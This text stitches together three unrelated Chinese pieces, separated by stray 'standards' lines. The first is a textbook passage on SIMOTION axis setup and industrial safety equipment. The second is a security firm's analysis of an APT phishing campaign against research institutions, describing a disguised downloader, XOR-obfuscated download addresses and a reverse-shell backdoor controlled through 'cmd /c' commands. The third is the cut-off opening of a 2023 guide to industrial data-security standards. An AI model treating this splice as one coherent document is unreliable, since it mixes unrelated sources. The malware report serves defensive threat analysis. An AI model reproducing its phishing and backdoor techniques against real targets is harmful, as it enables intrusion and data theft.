用 “ Project \ New” 命 令 创 建 一 个 新 项 目 “ D435 EASY START”, 如图6-58所示 。 图 6-58 建立新项目 2) 插入一个新设备 ,选择 D435V4.0,如图6-59和图6-60所示 。 3) 编译并下载 SIMOTION D组态 。下载组态如图6-61所示 。 4) 关闭硬件组态对话框如图 6-62所示 , 自动上载驱动器及电动机的型号参数 , 对于 有 Drive-CLiQ接口的轴 ,硬件参数可以自动上载到 PC。使用 SMC转换器的电动机需要手 工配置参数 。 图 6-59 插入 D435 图 6-60 D435硬件功能 5) 联机下载 SINAMICS参数 。参数设置过程包括控制方式选择 、选择电动机功率模 块 、选择电动机 、煞车方式 、选择电机编码器 、通信格式等过程 。这些过程可以根据选择的 运动控制系统参数选择即可 。至此已经组态了一个伺服系统, 但是 SIMOTION D只能够对 轴进行操作所以要把已经组态好的伺服系统分配给每根轴 。过程如下 。 6) Simotion D轴(Axis) 配置 。 .首先为一根轴指定控制方式 。轴配置如图6-63所示 。 .为轴分配伺服电动机, 驱动器分配如图6-64所示 。 .为轴指定编码器脉冲形式, 编码器组态如图6-65所示 。 . 一根轴配置结束 ,组态成功如图6-66所示 。 7) 联机下载 Simotion D的轴(Axis) 配置 ,下载组态如图6-67所示 。 至此一个完整的轴已经组态完成, 以后的程序中可以直接对轴进行运动等各种操作 。 图 6-61 下载组态 图 6-62 关闭硬件组态对话框 图 6-63 轴配置 图 6-64 驱动器分配 图 6-65 编码器组态 图 6-66 组态成功 图 6-67 下载组态 6.3.2 安全自动化技术在汽车制造业的应用 6.3.2.1 汽车制造冲压生产与安全要求 在汽车制造业中有冲压 、 焊装 、 涂装 、 总装和动力总成几大工艺 。 其中 , 冲压车间是这 几个工艺中最危险的 , 所以安全自动化技术在冲压车间的应用最多 、 要求也最局 。 冲压流水 线如图6-68所示 。 图 6-68 冲压流水线 一条冲压生产线一般由5~6台压机顺序组成。压机与压机之间由机械自动化装置连接,进行加工件的传递。这些机械自动化装置通常由机器人手臂组成。加工件在第一台压机完成 冲压成形之后,由机械手传递至下一台压机,完成第二次冲压成形。如此类推 , 从最后一台 压机运送出来的加工件就是目标成形产品。这样的一条高速冲压生产线,对自动化的要求非常 高。由于其复杂程度高,在保证工艺功能的同时,还必须保证生产线的安全性。其安全性就是 要保证生产线在生产运行、调试、清洗、维修过程中,不会对工作人员造成任何的伤害。通常, 机器生产商或系统集成商会采用各种各样的安全保护功能来提高冲压生产线安全性 。 6.3.2.2 汽车制造冲压生产安全自动化技术应用 (1) 紧急停止装置 。 为了消除直接的或即将出现的危险 ,压机生产线中的每一个操作台 、每一个现场电箱必 须具备紧急停止功能 , 紧急停止功能可以通过一个或多个紧急停止装置来实现 。在实际使用 过程中 , 紧急停止装置只能作为机器设备附加的预防危险的措施 , 而不能用来取代必需的安 全保护装置 ,也不能用作自动的安全装置 。 可以根据标准 EN418来设计和使用紧急停止装置, 这要求控制装置或操动装置的锁定 与紧急停止信号的触发之间的相互依赖关系更加紧密 , 同时还要能够防止紧急停止装置的锁 定状态被意外解除 。特别要指出的是, 对紧急停止装置有一个特殊的要求 , 即在给出紧急停 止的命令信号之后 ,控制装置的操动头必须能够通过预先设置在内部的机械结构来自动运动 到切断位置 。这就意味着只有那些内部具有弹簧结构 ,在操动力达到了压力点之后 , 能够自 动锁定的装置才能满足这个要求 , 而那些通过内部升起动作来实现锁定功能的装置则不能满 足这个要求 。 紧急停止装置能够防止机器设备在控制过程中的意外重启 。在使用传统的控制装置时存 在着一定的危险因素 , 即操动头很容易动作 ,不需要锁定和触发一个紧急停止信号 。在这种 情况下 ,对启动按钮的错误动作将会导致意外的 、甚至可能是危险的重新启动 , 因为没有锁 定功能 , 紧急停止设备的安全触点将不会再保持断开状态 。 除了对于颜色 、形状的要求外 , EN418: 1992标准中 , 还对紧急停止装置进行如下 规范: 1) 控制装置及其操动元件应该应用确切的机械动作原理 。 2) 在操动元件动作后 , 紧急停止装置应该可以消除机器设备的危险动作 , 或是自动地 以最有可能的方式降低危险 。 3) 紧急停止装置的操动元件动作后 ,在产生一个紧急停止命令信号的同时 , 应该会使 控制装置锁定在停止状态 ,这样当操动元件恢复原状后 , 紧急停止命令信号仍将保持, 直到 控制装置被复位(解锁)。 在紧急停止命令信号没有产生时 , 不允许使控制装置处于锁定状 态 。在控制装置出现故障的情况下 , 产生紧急停止命令信号的功能应该比锁定功能具有优 先权 。 4) 在控制装置处于动作期间 , 由紧急停止命令信号产生的机器设备的安全状态应该不 会被无意更改 。在产生紧急停止信号后 ,机器设备可以有停止类别0或1两种形式 , 因此紧 急停止应该具有如下功能之一: .符合停止类别0,也就是通过立即切断机器设备动作元件的工作电源使机器设备停止 下来 。 .使机器设备的危险部件与它们的机械操动元件之间形成机械脱离 , 如果有必要的话, 产生不受控制的制动 。 .符合停止类别 1, 也就是机器设备的动作元件在通电的情况下 , 其停止过程受到控 制 ,在达到停止状态后再切断其工作电源 。 (2) 安全门防护设备 。 为了防止人员在压机内遇到危险 ,可以采用多种方法 ,安装可移动的防护门是其中非常普遍的一种 。设计压机生产线的防护门时 ,应该能够做到在机器的危险运动停止之前, 或其 他危险因素被排除之前, 工作人员无法进入危险区域 。安全门开关和电磁开关锁可以用来对 可移动的防护门进行位置监控和锁紧 。安全门开关和电磁开关锁最大的特点是, 具有一个单 独的分离式的操动件(也可称为插片或操动钥匙)。 使用安全门开关和电磁开关锁必须实现 以下功能: 1) 能够确保在安全防护门打开时 ,压机或机械自动化装置不会产生危险的动作 。 2) 如果使用的是安全门开关, 则在压机或机械自动化装置运行过程中 , 一旦将可移动 的安全防护门打开 ,必须能够使压机或机械自动化装置的危险动作停止下来 。 3) 如果使用的是电磁开关锁, 则可移动的安全防护门必须一直保持锁定 , 直到压机或 机械自动化装置运行状态不会导致危险状况的产生 。 4) 在压机部分, 较多使用安全电磁开关锁, 这种安全电磁开关锁具有安全锁定和延时 解锁释放功能 。在以下安全电磁开关锁的两种工作方式下 ,关闭可移动的防护门都不会直接 启动压机或机械自动化装置的危险动作 。 安全电磁开关锁有两种工作方式 ,一种是通过弹簧力锁定 ,通过电磁力解锁; 另一种是 通过电磁力锁定 ,通过弹簧力锁定 。 弹簧力锁定工作方式的安全电磁开关锁是通过内部的弹 簧力来进行锁定 ,通过内部的电磁线圈通电产生的电磁力来进行解锁, 如果电磁线圈没有通 电, 则可移动的防护门将始终保持锁定状态 。在这种形式的电磁开关锁中 , 内部的弹簧为安 全型的弹簧, 其弹簧线圈之间的间隙比弹簧钢丝的直径还要小 , 这样可以避免弹簧的损坏, 确保弹簧可以实现安全的锁定功能 。 电磁开关锁的另一种工作方式是通过电磁力锁定 。 当开 关内部的电磁线圈通电后产生电磁力 ,这个电磁力克服弹簧的弹力之后将操动件锁定 , 而当 电磁线圈断电之后 , 弹簧将恢复原状, 从而将操动件解锁 。 在 EN1088— 1996标准中明确指出, 通过弹簧力锁定的电磁开关锁可以被当作安全开 关用来保护人身安全, 而通过电磁力锁定的电磁开关锁只能应用于少数情况 。所以在冲压生 产线中 ,通常使用弹簧锁定的电磁开关锁 。 (3) 双手控制设备 。 每一台压机必须使用至少一套双手控制装置, 进行手动冲压操作 。双手控制装置属于电 敏式安全保护装置, 其作用是当有人在操作机器设备, 给机器设备一个产生危险动作的信号 时 ,迫使其同时使用双手, 从而必须待在一个地方, 这样可以确保安全 。 双手控制装置是安全保护装置, 要求双手的动作必须要保持同时 ,这也就意味着在启动 机器或保持机器设备的运转时 , 只要机器设备的危险动作没有停止 ,操作人员的双手就会被 一直限制在远离危险区域的范围之内 。 在 prEN574— 1991标准中, 规定了三种不同类型的双手控制器 , 它们之间在安全保护 等级上有所区别: 1) 类型1。具有两种控制功能的可能性 ,要求双手同时操作 , 并且在机器设备的危险 运行过程中始终保持动作 , 一旦有一个控制操作装置被释放 , 机器设备的危险动作将立即 停止 。 2) 类型2。 除了类型1的要求外, 还要求当两个控制操作装置都释放后 , 机器设备的 再次运行必须要重新启动 。 3) 类型3。 除了类型1和2的要求外, 还要求两个控制操作装置必须在小于等于 0.5s的时间内同时动作 ,如果时间间隔超过 0.5s, 则必须将两个控制操作装置都释放 , 再重新 启动机器 。 (4) 安全光幕/光栅 。 在冲压生产线中 ,必须采用安全光幕/光栅进行换模区域和压机区域的安全防护 。 当自 动换模的时候 ,必须要保证人员没有进入该危险区域 。 由于模具是安放在压机线之外的开放 区域 ,可以采用安全光栅进行安全保护 。在压机与机械手的接口区域 , 也必须安装安全光 幕 。 以保证机械手或人员在压机内的时候 , 压机不能进行冲压操作 。 安全光幕/光栅是一种 保护各种危险机械装备周围工作人员的先进技术 。 同传统的安全措施 , 如机械栅栏 、滑动 门 、 回拉限制等相比 ,安全光幕/光栅更自由 、更灵活 。 在一个安全光幕/光栅中 , 一台光电发射器发射出一排排同步平行的红外光束 , 这些 光束被相应的接收单元接收 。 当一个不透明物体进入感应区域 , 中断了一束或多束红外 光束的正常接收 , 光栅的控制逻辑就会自动发出目标机器的紧急停止信号 。 发射装置装 备了发光二极管 (LED), 当光栅的定时逻辑控制回路接通时 , 这些二极管就会发射出肉 眼看不到的红外脉冲射线 。 这种脉冲射线按照预设的特定脉冲频率依次发射 (LED一个 接着一个亮)。 接受单元中相应的光电晶体管和支持电路被设计成只对这种特定的脉冲频 率有反应 。 这些技术更大地保障了安全性 , 并屏蔽了外来光源可能的干扰 。 控制逻辑 、 用户界面和诊断指示器可以被整合在一个独立的附件中 , 也可以与接收电路系统一起配 置在同一个机架上 。 (5) 安全控制设备 。 通常 ,一条典型的大型冲压生产线长约 40m , 宽约 8m , 地面上高度约 10m , 地下深度 约6.5m 。各现场输入输出设备就分布在这样一个广大的空间中 。 而控制系统所在的电柜放置在冲压线旁边高度为6m和10m的电柜平台上 。安全传 感装置分布于整条线的各个不同位置 。安全继电器 、模块 化安全 PLC都可以作为安全控制装置应用于压机生产线 。 但是由于安全功能较多 ,且逻辑功能较为复杂 , 安全继电 器的硬接线控制方式显然不适合冲压生产线安全应用 。 而 各个安全传感装置的离散式分布 , 使得采用集中式的模块 化安全 PLC的解决方案带来了电缆长 、诊断困难等缺点, 现场安全总线是最适合冲压生产线的安全解决方案 。PLC PSSSB3600安全系统如图6-69所示 。 每一台压机使用一套 SafetyBUS p安全总线系统 。 每 一套安全总线系统中使用一个紧凑型安全 PLC PSSSB 3006-3ETH2作为主站 , 通过 SafetyBUS p安全现场总 线 ,控制远程安全I/OPSSu。 PSSSB3006-3ETH2安装 在主电控柜之中 。远程I/OPSSu则安装在现场的电控箱 中 ,就近进行安全传感装置和安全触发装置的控制 。 每 一 套安全现场总线系统之间通过网桥进行安全信号的传输 。 这样就构成了压机生产线的安全自动化控制网络 。 同时, PSSSB3006-3ETH2可以通过以太网与工艺部分的控制系统或上位机系统进行诊断信号的传输 ,便于现场的故障排除 。 这样的安全解决方案在大众 、宝马等国内诸多汽车生产厂家的冲压车间中被应用 。 6.4 PLC紧急停车系统在工业控制中的应用 6.4.1 风力发电机组制造的安全要求 按照欧洲机械分类 ,风力发电机组属于机械的范畴 。风力发电机组机械可能对风机中维 修 、安装人员或者风机周围环境中的人员造成一定的伤害 。 同时 ,风机本身的设备损毁也会 带来巨大的损失 。 所以 , 必须考虑风力发电机组运行的安全 , 采取一系列的措施来降低 风险 。 电气控制系统是风力发电机组的核心技术之一 ,是风机安全可靠运行以及实现最佳运行 的保证 。风力发电机组中的电气控制系统可以分为(标准) 控制系统和安全系统两部分 。安 全系统和控制系统属于两个不同的概念 。控制系统指根据接受到的风力发电机组信息和/或 环境信息 ,调节风力发电机组 ,使其保持在正常运行范围内的系统 。安全系统指在逻辑上优 先于控制系统的一种系统 ,在超过有关安全的限值后 ,或者如控制系统不能使机组保持在正 常运行范围内 ,则安全系统动作 ,使机组保持在安全状态 。 当控制系统和安全功能发生冲突 之时 ,控制系统的功能应服从安全系统的要求 。 如图 6-70所示 , 控制系统监控转速 、风 速 、 电压和功率等有关风机运行的信号 ,依照运行程序 ,控制风机的正常运行 。 当根据程序 进行正常停机的时候 ,控制系统分别先后触发制动系统1和制动系统 2,保证风机处于停止 状态或空转状态 。安全系统监控有关安全的信号 ,如临界转速 、临界功率和振动 。 当安全系 统被触发之后 ,安全系统立刻激活制动系统1和制动系统2,并将风力发电机组断网 。 图 6-70 风力发电机的控制系统与安全系统的关系 下列情况下应该启动安全系统: 1) 控制系统功能失效 。 2) 超速 。 3) 风力发电机组过度振动 。 4) 由于机舱偏航转动造成电缆的过度扭曲 。 5) 发动机过载或出现故障(功率 、短路 、温度监控)。 6) 电网失电 、负载丢失时的关机失效 。 7) 紧急停止按钮被触发 。 可以采用两种安全解决方案——— 独立的安全控制系统(安全链) 和集成的安全控制系统 。 6.4.2 风力发电机组制造安全自动化技术应用 (1) 独立的安全控制系统 。 该解决方案采用完全分离的控制系统和安全系统 。这两个系统在物理上完全分离 , 控制 系统采用 Mita的 WP4000控制器作为解决方案 ,安全系统则采用 PilzPNOZmulti模块化安 全继电器作为解决方案 。Mita控制器负责风机运行相关的控制 , 而 PNOZmulti进行风机中 安全相关部分的控制 。 如图6-71所示的安全链控制 ,PNOZmulti作为 Logic部分接收外部安全相关信号 。这些 安全相关信号包括紧急停止信号 、临界转速 、振动开关 、临界功率 、变桨控制系统和风机控制 系统工作状况 、扭缆开关 、发动机绕组温度等 。在进行内部逻辑分析判断后 ,PNOZmulti输出 控制断网接触器 、刹车系统 、变桨和偏航系统等 ,干预风机运行 ,使其处于安全的状态 。 图 6-71 安全链控制图 由于安全链的逻辑功能不是很 复杂 , 无需要像控制系统那样采用 基于 PC的 PLC产品 。但是 , 由图6 -71可知 , 安全输入点数在 20个左 右 ,采用独立的安全 PLC成本过高; 如采用紧凑的 、独立的安全继电器, 安全功能之间的逻辑关系需要用硬 接 线 完 成 , 故 障 诊 断 较 困 难 。 PNOZmulti是一种模块化的安全继 电器 , 内部采用冗余的逻辑芯片和 冗余的输 出 电 路 , 实 现 失 效 — 安 全 的设计原则 。 每一套安全系统必须 有一个主模块 ,带有 20个输入点和 6个输出点 。 主模块可以扩展输入输出模块 , 以增加安全输入/输出点数 。 同时 , 主模块还可以扩展总线通信模块 , 如 Profibus、 Ethernet等与控制系统进行通信 。可以通过 RS232对主模块进行编程 , 编程方式不同于传 统的 PLC中的编程语句 , 而是极其简便的功能块图 。 这样的一种产品非常适合风力发电机 组的安全系统应用 。解决方案特点总结如下: 1) 成本低 。 2) 编程简单 ,逻辑功能实现简捷 、快速 。 3) 可以方便地连接控制系统 ,进行诊断数据传输 。 4) 分离地控制系统和安全系统 , 即标准功能与安全功能分离 。 (2) 集成的安全控制系统和标准控制系统 。 这种解决方案将安全控制系统集成在标准控制系统之中 ,用一套系统和一套总线即可以完成标准和安全功能 。典型的解决方案如 Bechhoff的基于 PC的控制系统 。一般塔基的控制 系统为一台装有 TwinCAT自动化软件的 CX1020嵌入式 PC。模块化的 CX系统除配有标准 接口(USB,DVI和 Ethernet TCP/IP) 以外 , 还选配了一个 CAN总线接口 , 用于与变频 器的通信 。其他连接传感器和执行器的I/O站点则通过高速 EtherCAT总线系统进行通信 。 独立的变桨系统则通过 PROFIBUS主站总线模块集成到 EtherCAT I/O系统中 。机舱及塔 基中的安全传感器和执行器也可以通过 TwinSAFE技术直接集成到 EtherCAT系统中 , 因 此无需额外的安全控制系统和安全总线系统 。该解决方案特点总结如下: 1) 在控制系统中整合了安全功能 , 即一个平台或一个系统就可以完成安全和非安全 功能 。 2) 安全与非安全功能在同一个界面中编程 ,符合IEC61131-3。 3) 安全协议以 EtherCAT为媒介 ,一根总线实现安全与非安全通信 。 参 考 文 献 [1] 杨东 ,黄永红 . 交通红绿灯 PLC控制系统编程方法与技巧,《微计算机信息》 2006(1). [2] 罗庚兴 . 西门子 STEP7编程软件的使用方法 ,南方金属 ,2006, 10. [3] 薛吉 . 工业以太网 EtherNet_IP介绍及其产品开发 ,低压电器 2009(5). [4] 周侗 ,何旭东 , 陈瑶 ,魏剑嵬 , 吕勇 . 基金会现场总线用户层协议分析与实现 , 信息与控制 , 2002 (4). [5] 王廷尧 , 马克城 . 以太网知识讲座(1)— 以太网的基本概念 ,天津通信技术 ,2002(1). [6] 冯晓升 . 功能安全技术讲座第二讲功能安全的基本方法 ,仪表标准化与计量 ,2007(2). [7] 冯晓升 . 功能安全技术讲座第三讲基于风险的 SIL确定技术 ,仪表标准化与计量 ,2007(3). [8] 冯晓升 . 功能安全技术讲座第四讲安全相关系统 SIL设计的要求 ,仪表标准化与计量 ,2007(4). [9] 冯晓升 . 功能安全技术讲座第五讲安全相关系统 SIL设计的要求_续 ,仪表标准化与计量 ,2007(5). [10] 齐宁宁 . 基于 PLC的开放式数控车控制系统研制 . 成都: 西南交通大学 ,2006. [11] 吴成岩 . PROFIsafe安全总线协议的研究分析 . 北京: 北京交通大学 ,2006. [12] 范园园 . 现场总线控制系统及其在喷涂生产线的应用 . 上海: 上海交通大学 ,2006. [13] 李常辉 . 基于 PLC的 PCB数控机床电气控制系统研制 . 上海: 西南交通大学 ,2008. [14] 徐小冲 . 盘南电厂 600MW 机组 DCS安全设计的研究 . 上海: 上海交通大学 ,2007. [15] 黄之炯 . 机械制造业控制系统的安全自动化技术和应用 . 上海: 上海交通大学 ,2009. [16] 赵铮 . 系统安全自动化技术 ,上海: 上海交通大学 ,2009. [17] 韩兵 . PLC编程与故障排除 ,北京: 化学工业出版社 ,2009. [18] 陈永利 . 基于 PLC的高炉槽下配料控制系统 ,重庆大学 ,2006.
standards
“X象”组织针对我国科研机构的钓鱼攻击事件分析 1.概述 2023年下半年,安天CERT(安全研究与应急处理中心)在日常邮件监测中发现,境外APT攻击组织通过模仿我“慧眼行动”官方组织机构,向相关科研机构发送钓鱼邮件,以附件形式投放特洛伊木马,以实施后续攻击。邮件包含一个压缩包附件,压缩包内为一个构造的可执行文件。该文件基于文件名、图标和与正常文件捆绑三种伪装方式,模仿成相关活动的申报客户端。打开可执行文件后,会连接到攻击者服务器下载后续攻击载荷,最终通过后门在受害者机器与攻击者C2服务器之间建立管道SHELL以实现远程控制。 安天CERT基于代码、线索分析和综合研判,基本确认相关攻击来自南亚某国,但目前尚无充分信息确定关联到安天已经命名的具备同一国家背景的已知威胁行为体,但也尚不能完全判定其是一个新的攻击组织,按照安天对威胁行为体的命名规则,临时使用“X象”作为其命名,我们会持续监测、跟踪分析攻击者的后续攻击活动,将在归因条件成熟时,修订其组织命名。 2.2 攻击活动分析 2.1 攻击流程分析 攻击者通过仿冒“慧眼行动”官方机构的身份向攻击目标发送鱼叉式钓鱼邮件,攻击者欺骗收件人运行邮件附件中伪装成申报客户端软件的初始诱饵程序,该程序是第一阶段的下载器,一方面下载并运行合法的“慧眼行动”官方软件运行展示给攻击目标,另一方面下载运行第二阶段下载器。第二阶段下载器执行后会解密出一个链接地址,下载并运行最终的后门程序,后门程序的功能较为简单,主要为创建与C2服务器之间的SHELL通道实现对受害者机器的远程访问,样本投递与执行流程如图2-1所示。 2.2 攻击邮件分析 攻击邮件如图2-2所示,发件邮箱为info@*.*.com,其中域名中的部分字符串模仿“慧眼行动”官方的域名,经过whois查询发现为2023年07月11日新注册的域名,为攻击邮件发送的一天前。 攻击邮件的主题为《温馨提示:关于“慧眼行动”申报客户端最新版本的通知》,邮件使用称呼为“尊敬的老师”,符合中文称呼习惯。邮件正文有针对性进行了内容构造以“近期申报客户端上的重量流量和经常失败状况旧版已经停止使用”为名义来诱使收件人打开安装附件中的执行文件。同时,相关内容表述有明显的错误,不符合中文表达习惯,怀疑攻击团队中有人有中文学习背景并不精通,或基于攻击者母语或英语与构造内容后使用机翻来生成的内容。邮件附件附件是名为“慧眼行动申报客户端2.0”的压缩包,压缩包为ZIP压缩格式,解压缩后是同名的exe可执行程序,为投递恶意木马的下载。 2.3 初始诱饵分析 表2-1 样本标签 病毒家族名称 Trojan[Downloader]/Win64.Agent 原始文件名 慧眼行动申报客户端2.0.exe 处理器架构 x86-64 文件大小 301 KB (308,224 字节) 文件格式 BinExecute/Microsoft.EXE[:X64] 时间戳 2023-07-12 12:45:09 数字签名 无 加壳类型 无 编译语言 C/C++ 邮件附件内的攻击载荷功能为木马下载器,该样本采用混淆的方式将C2地址隐藏在无意义的字符串中,如下图,两个无意义字符串为经过混淆的C2地址,通过sub_140001FB0函数,将真实C2地址解析出来。 图2-3 经过混淆的C2字符串 sub_1400001FB0函数通过异或的方式将混淆的C2地址逐步解析出来 对于其他的混淆字符串采用循环的方式逐个字符进行异或,如下图2-9。 图2-9 逐个字符进行异或 最终将经过混淆的字符串解析为完整的下载地址https://94.198.*.*/tool/app/exe/ver/2.0/iexplorer.exe。同理另一个经过混淆的字符串经过解析后得到第二个下载地址https://94.198.*.*/tool/app/exe/abcd.exe。 最后,通过调用URLDownloadToFileW API将C2中的恶意代码下载到本地主机的用户目录中。 2.4 掩饰程序分析 该样本为“慧眼行动”官方软件,是攻击者为迷惑受害者下载的正常软件。 2.5 下载器分析 表2-2 样本标签 病毒家族名称 Trojan[Downloader]/Win64.Agent 原始文件名 iexplorer.exe 处理器架构 x86-64 文件大小 107 KB (110,080 字节) 文件格式 BinExecute/Microsoft.EXE[:X64] 时间戳 2023-07-11 15:50:02 数字签名 无 加壳类型 无 编译语言 C/C++ 该样本与2.3样本功能相似,同样采用混淆的方式将C2地址隐藏在无意义的字符串中,通过将字符串以字符为单位循环减2,最终得到下载地址的取反,通过该下载地址将恶意代码msedges.exe下载到本地主机的临时文件目录中。 2.6 后门分析 该样本是通过iexplorer.exe下载器从C2服务器中下载得到,实际功能为设计简单的反弹SHELL后门程序。 表2-3 样本标签 病毒家族名称 Trojan[Backdoor]/Win64.AGeneric 原始文件名 msedges.exe 处理器架构 x86-64 文件大小 1.29 MB (1,359,872 字节) 文件格式 BinExecute/Microsoft.EXE[:X64] 时间戳 2023-07-11 15:04:37 数字签名 无 加壳类型 无 编译语言 C/C++ VT首次上传时间 2023-07-17 08:14:40 UTC VT检测结果 11/69 该后门的连接地址为46.249.*.*,端口443。 图2-11 连接C2服务器 C2向后门响应数据的格式是“控制代码+数据”的形式,数据可以是路径或命令等,控制指令如下: a). 当控制代码为0时,C2响应后方跟的是“命令”,通过创建的管道执行“cmd /c 命令” 图2-12 控制代码为0 b). 当控制代码为1时,后方跟的是路径,用于切换工作目录 图2-13 控制代码为1 c). 当控制代码为2,清理痕迹并退出流程 图2-14 控制代码为2 d). 当控制代码为5,清理痕迹等待10秒重新开始以上流程 图2-15 控制代码为5 e). 当控制代码为6时,不清理痕迹直接等待5秒重新开始以上流程 图2-16 控制代码为6 3.攻击目的分析 “慧眼行动”是我国一项科研成果征集活动。根据官方网站介绍:“慧眼行动”是通过广泛扫描地方高校、中科院所属院所、民营企业、地方国企、省/市属科研机构、行业科研机构以及国家实验室、全国重点实验室、地方创新联合体等全社会创新力量,发现遴选具有重大装备应用前景或技术引领作用的民口创新成果,支持向装备领域快速转化应用的专项行动。 基于攻击过程和其所仿冒的相关信息分析,可见攻击者以我国高校、科研院所、创新企业、科研机构等为攻击目标,通过社工伪装试图实现对相关科研人员电脑的远程控制,试图窃取相关科研信息成果,以及进行其他的相关活动。一旦收件人受到欺骗执行,或误点击执行了相关木马。电脑主机则会被攻击者完整控制,攻击者不仅可以获得主机上的全部文件和相关账号凭证等信息。还会以对应主机和身份为跳板进行横向移动和信任链攻击,可以带来严重安全威胁。 4.威胁框架视角的攻击映射 本次系列攻击活动共涉及ATT&CK框架中8个阶段的10个技术点,具体行为描述如下表: 表4-1 本次攻击活动的技术行为描述表 ATT&CK阶段 具体行为 注释 侦察 搜集受害者身份信息 搜集受害者网络账号、工作内容等信息 搜集受害者组织信息 搜集受害者所属工作单位信息 资源开发 获取基础设施 搭建载荷分发节点、后门控制C2等 能力开发 恶意组件研发制作 初始访问 网络钓鱼 攻击者通过鱼叉式钓鱼邮件投递木马程序 执行 诱导用户执行 初始诱饵伪装成官方软件诱导用户执行 防御规避 仿冒 攻击组件仿冒官方软件、浏览器程序等 命令与控制 使用标准非应用层协议 后门程序设定标准TCP协议进行C2控制 数据渗出 使用C2信道回传 攻击者可能通过已有C2信道回传数据 影响 操纵数据 攻击者可能展开操纵受控机数据内容操作 将涉及到的威胁行为技术点映射到ATT&CK框架如下图所示: 图4-1 本次攻击活动对应ATT&CK映射图 5.防护建议 近两年来,境外APT攻击组织仿冒我国相关部委机构,的钓鱼活动频发,攻击者或以文献报告传达分发、项目申报、荣誉资质申请为素材,通过精心构造模仿的主题邮件发送钓鱼邮件,利用邮件正文中附带仿冒钓鱼网站连接窃取目标邮箱账号;通过附件投递恶意代码等方式,试图控制目标主机或窃取主机内敏感信息。这类钓鱼邮件攻击手法看似没有更高的技术能力手段,但实际危害极大。一是因为其实施成本及其低廉便于实施,二是其不必突防目标网络边界和纵深防护,只需构造好相关邮件便可直达目标人员的终端。三是可以大面积批量化进行投放。 面对此类精准仿冒的钓鱼邮件攻击,我们需要精准施策: 5.1 对政企机构、科研院所的安全建议 1. 钓鱼邮件攻击的最终目标是端点系统的使用者,端点系统是防御威胁的最后防线。建议使用具有较强病毒查杀能力、主动防御能力和钓鱼攻击检测拦截能力的端点安全防护软件,如安天智甲终端防御系统。 2. 重点人员,特别是频繁使用邮件对外通讯交互的人员,建议提升防护等级,基于终端防护软件使用白名单防护策略。针对所有新的可执行文件,均上报管理中心留存,并基于网管人员的审核确认方能运行。终端防护软件的白防功能应提供基于签名证书、文件Hash、文件路径等组合配置策略,以在保障可信环境塑造同时检测网管可信操作能力。 3. 建议政企机构注册独立“.cn”域名,并为所有工作人员分配工作信箱。不建议政企机构使用互联网免费邮箱承载工作连接活动。 4. 对于中大型机构和敏感机构,建议基于安全可靠的企业邮件系统进行邮件服务部署,并强化相关的服务器安全策略、监测策略和邮件威胁联动检测机制,将邮件相关系统日志和对应的监测日志汇聚到安天XDR和其他管理平台统一监测。 5. 对于使用互联网公有云邮箱服务的政企机构,网络管理人员也需要监测相关安全事件,将可导出的安全日志汇聚到安天XDR和其他管理平台。 6. 在企业内网和互联网出口设置流量监测环节,如安天探海NDR产品,对钓鱼邮件投放、钓鱼链接点击,被木马植入后C2连接等情况进行持续监测和响应。 5.2 对具有相关科研、学术活动主办方的安全建议 1. 使用本机构域名信箱进行相关工作联系,使用官网域名发布相关填报入口,提供填报软件下载,做好对应网站自身安全防护工作。 2. 网站访问和文件下载均使用HTTPS加密协议,避免访问劫持和捆绑投放。 3. 对自身供应商提出明确要求,如相关客户端、安装包与二进制程序等,要求做好签名环境的安全防护,避免证书失窃,以确保相关软件具有可辨识性、可追溯性,便于自身安全防护软件添加策略规则。 4. 对可能参与相关活动的人员进行安全提示,明确工作网站、工作信箱、官网下载地址、程序签名信息等要素。明确不会在附件中直接发送二进制文件等安全规则。 5.3 对系统终端使用者的安全建议 1. 安装由单位提供/或个人选择具有较强病毒查杀能力、主动防御能力和钓鱼攻击检测拦截能力的端点安全防护软件。 2. 在收到相关邮件时,检查发件人信箱是否与相关机构一致。对于来自非可信域的邮件一律采取附件不打开、链接不点击、二维码不扫描的措施。 3. 对系统相关配置策略进行调整,如选择显示已知格式扩展名等策略,避免攻击者用文档、图片等软件图标诱骗点开打开可执行文件。 由于钓鱼攻击的防范和治理涉及大量的安全要素,难以在一篇分析报告中反馈所有安全建议。
standards
工业领域数据安全标准体系 建设指南(2023 版) 2023 年 12 月 目 录 一、总体要求 ..............................................................................1 (一) 基本原则 .................................................................. 1 (二) 建设目标 .................................................................. 2 二、主要内容 ..............................................................................2 (一) 体系框架 .................................................................. 2 (二) 重点领域 .................................................................. 5 1.基础共性标准 ................................................................ 5 2.安全管理标准 ................................................................ 6 3.技术和产品标准 ............................................................ 7 4.安全评估与产业评价标准 ............................................9 5.新兴融合领域标准 ...................................................... 10 6.工业领域细分行业标准 ..............................................12 三、组织实施 ............................................................................13 一、总体要求 以习近平新时代中国特色社会主义思想为指导,全面贯 彻党的二十大精神,深入落实《中华人民共和国数据安全法》 《工业和信息化领域数据安全管理办法(试行)》等法律法 规和政策文件要求,建立健全工业领域数据安全标准体系, 加快弥补关键基础标准短板,强化重点急需标准供给,着力 推动标准应用实施和国际标准化工作,有效支撑工业领域数 字化转型,护航数字经济高质量发展。 (一)基本原则 统筹规划,全面布局。统筹标准化工作资源,结合工业 领域技术和产业发展现状及特点,以满足工业领域数据安全 保障需求为目标,坚持政府引导和市场驱动相结合,建立健 全工业领域数据安全标准体系。 需求引导,多层构建。结合不同行业工业领域数据安全 标准化需求,在体现工业领域数据安全共性的基础上,突出 工业领域和各工业领域细分行业所具有的个性,形成以国家 标准为基础、行业标准为主体、团体标准为补充的标准化工 作格局,推动构建各类标准衔接有序、融合发展的多层次标 准架构。 基础先立,急用先行。围绕工业领域数据安全工作重点 和难点,加快数据分类分级、重要数据识别、分级防护基础 共性标准的制定发布。综合考虑工业领域数据安全现状及面 临的风险挑战,加快推进重点急需标准的研究制定。 注重实效,开放合作。加强标准与法规政策的配套承接, — 1 — 组织开展标准宣贯培训、对标达标和实施监督,提升标准应 用实践成效。积极开展国际交流合作,加大国际标准化工作 参与力度,建立适用度高、开放性强的工业领域数据安全标 准体系。 (二)建设目标 到 2024 年,初步建立工业领域数据安全标准体系,有 效落实数据安全管理要求,基本满足工业领域数据安全需 要,推进标准在重点行业、重点企业中的应用,研制数据安 全国家、行业或团体标准 30 项以上。 到 2026 年,形成较为完备的工业领域数据安全标准体 系,全面落实数据安全相关法律法规和政策制度要求,标准 的技术水平、应用效果和国际化程度显著提高,基础性、规 范性、引领性作用凸显,有力支撑工业领域数据安全重点工 作,研制数据安全国家、行业或团体标准 100 项以上。 二、主要内容 (一)体系框架 工业领域数据安全标准体系明确了总体框架,以及基础 